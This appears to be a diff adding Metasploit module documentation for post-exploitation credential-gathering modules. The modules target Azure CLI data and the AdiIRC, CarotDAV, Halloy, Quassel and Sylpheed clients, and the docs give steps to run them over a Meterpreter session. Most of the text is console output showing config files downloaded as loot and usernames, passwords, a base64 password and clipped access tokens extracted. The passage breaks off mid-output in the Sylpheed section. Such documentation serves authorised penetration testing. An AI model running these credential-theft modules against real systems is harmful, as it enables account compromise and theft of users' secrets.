+[*] Looking for az cli data in C:\Users\windows
+[*]   Checking for config files
+[+]     .Azure/config stored in /root/.msf4/loot/20240616175854_default_111.111.1.11_azure.config.ini_081029.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240616175855_default_111.111.1.11_azure.profile.js_357740.txt
+[*]   Checking for console history files
+[*] Post module execution completed
+```
+
+### 2.61.0 on Windows 10
+
+```
+msf6 post(multi/gather/azure_cli_creds) > rerun
+[*] Reloading module...
+
+[*] az cli version: 2.61.0
+[*] Looking for az cli data in C:\Users\kali
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*]   Checking for console history files
+[+]     C:\Users\kali/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.console_hi_878016.txt
+[*]   Checking for powershell transcript files
+[*] Looking for az cli data in C:\Users\h00die
+[*]   Checking for config files
+[+]     .Azure\config stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.config.ini_539242.txt
+[*]   Checking for context files
+[+]     .Azure/AzureRmContext.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.context.js_041230.txt
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.profile.js_538496.txt
+[*]   Checking for console history files
+[+]     C:\Users\h00die/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.console_hi_210490.txt
+[*]   Checking for powershell transcript files
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20150720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_021248.txt
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20230720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_743088.txt
+[+] Line 1 may contain sensitive information. Manual search recommended, keyword hit: New-PSSession
+[+] Subscriptions
+=============
+
+ Account Name               Username                              Cloud Name
+ ------------               --------                              ----------
+ EXAMPLE11111               1111111111111-1111-1111-111111111111  AzureCloud
+ N/A(tenant level account)  james@example12.onmicrosoft.com       AzureCloud
+
+[+] Context
+=======
+
+ Username                           Account Type      Access Token                           Graph Access Token                       MS Graph Access Token  Key Vault Token                       Principal Secret
+ --------                           ------------      ------------                           ------------------                       ---------------------  ---------------                       ----------------
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng                         eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ 111                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz  1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVU                         Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                 (clip)                                                          (clip)
+ HelpDeskAdmin@example123456.onmic  User
+ rosoft.com
+ 1111111111111-1111-1111-111111111  ServicePrincipal
+ a1c
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI                                                                  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ f40                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz                                                                  Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                                                                                 (clip)
+ storageviewer@example12.onmicros  User
+ oft.com
+
+[*] Post module execution completed
+msf6 post(multi/gather/azure_cli_creds) > 
+```
+
+### 2.35.0 on Docker
+
+```
+msf6 post(multi/gather/azure_cli_creds) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api, stdapi_railgun_api_multi, stdapi_railgun_memread, stdapi_railgun_memwrite, stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
+[*] Unable to determine az cli version
+[*] Looking for az cli data in /bin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /dev
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /home/user
+[*]   Checking for config files
+[+]     .azure/config stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.config.ini_433702.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .azure/azureProfile.json stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.profile.js_201042.txt
+[*] Looking for az cli data in /nonexistent
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /root
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/games
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/sbin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/backups
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/cache/man
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/lib/gnats
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/list
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/mail
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/run/ircd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/lpd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/news
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/uucp
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/www
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[+] Subscriptions
+=============
+
+ Account Name               Username                                          Cloud Name
+ ------------               --------                                          ----------
+ N/A(tenant level account)  example123@example12345678901234.onmicrosoft.com  AzureCloud
+
+[*] Post module execution completed
+```
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Adi IRC Client.
+
+The Adi IRC Client is avaialble from (https://www.adiirc.com/).
+
+This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
+
+This module extracts server information such as server name, server port, user name, and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/adi_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Adi irc's Config file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
+[*] Adi irc's Networks file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
+
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Adi irc's base folder not found in user's user directory
+
+[-] Adi irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for config.
+[*] Adi irc's Config file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083813_default_10.0.0.2_AdiIRCconfig.ba_900175.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_209914.bak
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCconfig.in_918837.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_383684.ini
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._579169.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_073623.ini
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for networks.
+[*] Adi irc's Networks file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._045399.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083815_default_10.0.0.2_AdiIRCnetworks._439992.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
@@ -0,0 +1,107 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
+
+The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
+
+This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
+
+This module extracts server information such as connection name, target URI, username and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/carotdav_ftp
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Carotdav's Setting file found
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml
+
+[+] <Name>TheTestBed</Name>
+[+] <Name>Aperture Testing Laboratories</Name>
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[+] <UserName>TestBed\TheTester</UserName>
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Carotdav's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Carotdav's base folder found
+[*] Found the folder containing specified artifact for Setting.
+[*] Carotdav's Setting file found
+[*] Processing C:\Users\test\AppData\Roaming\Rei Software\CarotDAV
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_CarotDAVSetting._292914.xml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>TheTestBed</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>Aperture Testing Laboratories</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_EXTRACTIONSSetti_754664.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
+
+The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
+
+This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
+
+This module extracts server information such as server, port, nickname, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/halloy_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/halloy_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Halloy irc's Config.toml file found
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml
+
+[+] server="irc.libera.chat"
+[+] port=6697
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Halloy irc's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Halloy irc's base folder found
+[*] Found the folder containing specified artifact for config.toml.
+[*] Halloy irc's Config.toml file found
+[*] Processing C:\Users\test\AppData\Roaming\halloy
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_HalloyIRCconfig_292638.toml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] server="irc.libera.chat"
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] port=6697
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_EXTRACTIONconfig_238220.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,131 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
+
+The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
+
+This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
+
+This module extracts server information such as host name, port, account name, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/quasell_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Quassel irc's Quasselclient.ini file found
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini
+
+[+] 1\HostName=10.245.100.2
+[+] 2\HostName=10.0.0.3
+[+] 1\Port=4242
+[+] 2\Port=1234
+[+] 1\AccountName=Test
+[+] 2\AccountName=Test#2
+[+] 1\Password=tiaspbiqe2r
+[+] 2\Password=tiaspbiqe2r
+[+] 1\ProxyHostName=localhost
+[+] 2\ProxyHostName=
+[+] 1\ProxyPort=8080
+[+] 2\ProxyPort=8080
+[+] 1\ProxyUser=test
+[+] 2\ProxyUser=
+[+] 1\ProxyPassword=tiaspbiqe2r
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Quassel irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Quassel irc's base folder found
+[*] Found the folder containing specified artifact for quasselclient.ini.
+[*] Quassel irc's Quasselclient.ini file found
+[*] Processing C:\Users\test\AppData\Roaming\quassel-irc.org
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_QuasselIRCquass_310535.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\HostName=10.245.100.2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\HostName=10.0.0.3
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Port=4242
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Port=1234
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\AccountName=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\AccountName=Test#2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyHostName=localhost
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyHostName=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyUser=test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyUser=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPassword=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_EXTRACTIONquasse_967148.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,408 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Sylpheed Email Client.
+
+The Sylpheed Email Client is avaialble from (https://sylpheed.sraoss.jp/en/).
+
+This module extracts information from the accountrc file in the "AppData\Roaming\Sylpheed" directory.
+
+This module extracts server information such as account name, username, email address and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/sylpheed
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Sylpheed's Accountrc file found
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_511987.bin
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_EXTRACTIONaccoun_507929.bin
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_329585.1
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_146899.1
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_450482.bak
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_424899.bak
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
